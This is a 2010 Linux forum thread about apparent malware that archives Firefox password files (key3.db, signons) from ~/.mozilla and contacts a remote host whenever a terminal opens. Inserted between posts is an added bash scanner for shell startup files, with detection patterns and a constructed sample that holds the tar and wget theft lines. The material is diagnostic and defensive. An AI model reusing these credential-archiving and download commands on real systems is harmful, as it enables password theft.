
Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder


    Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

    When I open a terminal I get this strange message:

    key3.db
    tar: signons*.txt: Cannot stat: No such file or directory
    tar: Exiting with failure status due to previous errors
    --2010-01-11 17:39:27-- http://shiftytransfer.x10hosting.com/index.php
    Resolving shiftytransfer.x10hosting.com... 74.63.233.3
    Connecting to shiftytransfer.x10hosting.com|74.63.233.3|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: `index.php'

    [ <=> ] 187 --.-K/s in 0s

    2010-01-11 17:39:30 (11.9 MB/s) - `index.php' saved [187]

    bash: warning: here-document at line 10 delimited by end-of-file (wanted `_EOF_')
    Login authentication failed
    Login failed.
    You aren't logged in
    ftp: bind: Address already in use
    garfilth@mine:~/.mozilla$ cd /home/garfilth/.mozilla
    garfilth@mine:~/.mozilla$ clear

    I delete the .mozilla folder and it comes back. I have been to the website in the message and there is nothing there apart from a 404 error and links to set up your own web hosting.

    Other people are having the same problem over on the Ubuntu forums.

    I get two files in my .mozilla folder called key3.db and unlucky.tar.gz. I will upload them if someone wants to have a look at them.

    I'm stumped.

    Not sure if it's malware or some other strange stuff.

    Anyone else with this?

    thanks in advance
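
The output above appears every time a terminal opens, and bash itself reports a here-document error, which points to commands being read from a shell startup file. The following check is an added example, not part of the original thread: it flags startup-file lines that touch the Firefox credential files named in the output or call a network transfer tool. The function names, the sample file and the `example.invalid` URL are hypothetical, and the assumption that the commands sit in one of the usual bash startup files is not confirmed by the thread.

```bash
#!/usr/bin/env bash
# Added example (not from the thread): flag shell startup lines that touch
# Firefox credential stores or call a network transfer tool.

# Indicators taken from the terminal output quoted in the first post.
CRED_RE='key3[.]db|signons[^[:space:]]*[.]txt|[.]mozilla'
NET_RE='(^|[^[:alnum:]_])(wget|curl|ftp)([^[:alnum:]_]|$)'   # curl is an added guess

# scan_startup FILE...
# Prints "file:line:text" for every non-comment line matching an indicator.
# Returns 0 if at least one line was flagged, 1 if every file looked clean.
scan_startup() {
    local f hits found=1
    for f in "$@"; do
        [ -r "$f" ] || continue
        hits=$(grep -HnE "$CRED_RE|$NET_RE" -- "$f" |
               grep -vE '^[^:]*:[0-9]+:[[:space:]]*#') || true
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits"
            found=0
        fi
    done
    return "$found"
}

# write_sample FILE: constructed sample of a tampered startup file, modelled
# on the commands whose output appears in the post (tar, wget). Not real data.
write_sample() {
    cat > "$1" <<'SAMPLE'
# constructed sample, not recovered from an affected machine
alias ll='ls -l'
cd ~/.mozilla
tar czf unlucky.tar.gz key3.db signons*.txt
wget http://example.invalid/index.php
# wget mentioned only in a comment
export EDITOR=vi
SAMPLE
}

# With file arguments, scan them, e.g.:
#   ./scan.sh ~/.bashrc ~/.profile ~/.bash_profile ~/.bash_login ~/.bash_aliases
if [ "$#" -gt 0 ]; then
    scan_startup "$@" || echo "no indicators found"
fi
```

A hit is a lead for manual review of that line, not proof of compromise; a clean result does not rule out other persistence locations.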

    #2
    Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

    key3.db is a Firefox file for storing passwords and user names.

    Look here: http://kb.mozillazine.org/Key3.db

    Still don't know what Unlucky.tar.gz is and why it takes over the terminal.

    Hope this helps a bit.



      #3
      Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

      signons2.txt contains the encrypted passwords: http://kb.mozillazine.org/Signons.txt

      But, I think that JohnnyG713 should purge FireFox and its addons and reinstall them, after changing his account password to something a little less obvious.
      "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
      – John F. Kennedy, February 26, 1962.



        #4
        Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

        Appears to be associated with FireFox only, and I'm thinking a data miner written to exploit Mozilla, but maybe for Windoze? Several posts on this over on Ubuntuforums:

        Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder !!!!!!
        Gnome Terminal help

        A whois on shiftytransfer.x10hosting.com returns 'No match for "SHIFTYTRANSFER.X10HOSTING.COM".'
        A traceroute on shiftytransfer.x10hosting.com is masked after the 13th hop:

        13 2-233-63-74.reverse.lstn.net (74.63.233.2) 136.026 ms 134.720 ms 140.301 ms
        *
        *
        *
        *
        A ping to shiftytransfer.x10hosting.com doesn't make it past:
        64 bytes from 3-233-63-74.reverse.lstn.net (74.63.233.3): icmp_seq=50 ttl=55 time=137 ms
        Windows no longer obstructs my view.
        Using Kubuntu Linux since March 23, 2007.
        "It is a capital mistake to theorize before one has data." - Sherlock Holmes



          #5
          Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

          Ya, the Ubuntu URL is where JohnnyG713 posted his plea for help!

          Your reverse IP is what I got for

          absolut.x10hosting.com

          ping shiftytransfer.x10hosting.com
          PING shiftytransfer.x10hosting.com (74.63.233.3) 56(84) bytes of data.
          64 bytes from absolut.x10hosting.com (74.63.233.3): icmp_seq=1 ttl=48 time=62.9 ms
          64 bytes from absolut.x10hosting.com (74.63.233.3): icmp_seq=2 ttl=48 time=58.2 ms
          64 bytes from absolut.x10hosting.com (74.63.233.3): icmp_seq=3 ttl=48 time=69.3 ms

          ...


          whois 74.63.233.3

          OrgName: Limestone Networks, Inc.
          OrgID: LIMES-2
          Address: 400 N. St. Paul
          City: Dallas
          StateProv: TX
          PostalCode: 75201
          Country: US

          ReferralServer: rwhois://rwhois.limestonenetworks.com:4321

          NetRange: 74.63.192.0 - 74.63.255.255
          CIDR: 74.63.192.0/18
          OriginAS: AS46475
          NetName: LSN-DLLSTX-3
          NetHandle: NET-74-63-192-0-1
          Parent: NET-74-0-0-0-0
          NetType: Direct Allocation
          NameServer: NS1.LIMESTONENETWORKS.COM
          NameServer: NS2.LIMESTONENETWORKS.COM
          NameServer: NS3.LIMESTONENETWORKS.COM
          Comment: http://www.limestonenetworks.com
          RegDate: 2008-08-29
          Updated: 2008-11-10

          RAbuseHandle: ABUSE1804-ARIN
          RAbuseName: Abuse
          RAbusePhone: +1-214-586-0555
          RAbuseEmail: abuse@limestonenetworks.com

          RNOCHandle: NOC2791-ARIN
          RNOCName: Network Operations Center
          RNOCPhone: +1-214-586-0555
          RNOCEmail: noc@limestonenetworks.com

          RTechHandle: NOC2791-ARIN
          RTechName: Network Operations Center
          RTechPhone: +1-214-586-0555
          RTechEmail: noc@limestonenetworks.com

          OrgAbuseHandle: ABUSE1804-ARIN
          OrgAbuseName: Abuse
          OrgAbusePhone: +1-214-586-0555
          OrgAbuseEmail: abuse@limestonenetworks.com

          OrgTechHandle: NOC2791-ARIN
          OrgTechName: Network Operations Center
          OrgTechPhone: +1-214-586-0555
          OrgTechEmail: noc@limestonenetworks.com

          # ARIN WHOIS database, last updated 2010-01-11 20:00
          # Enter ? for additional hints on searching ARIN's WHOIS database.
          #
          # ARIN WHOIS data and services are subject to the Terms of Use
          # available at https://www.arin.net/whois_tou.html


          Found a referral to rwhois.limestonenetworks.com:4321.

          getaddrinfo(rwhois.limestonenetworks.com): No address associated with hostname
          I think it was a "data miner" also, ... the "data" being login names and passwords.


            #6
            Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

            IF in fact this is a data miner for addresses/passwords, you've got to admire the cojones of the creator for the name used on the zip file - Unlucky.tar.gz. I would never open such a named file!


              #7
              Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

              Thanks, all.

              I backed up what I needed to, then formatted and reinstalled.

              Seems to have worked.



                #8
                Re: Bad terminal -Mozilla- UNLUCKY.tar.gz In Mozilla folder

                FireFox "add-ons" and extensions are a hot topic with Mozilla right now.

                A list of "problematic" extensions is here.

                Mozilla is making noise about replacing the old addon technology with their new "jetpack" development sdk. Of course, with so many developers having invested a lot of effort into creating addon applets, there is grumbling.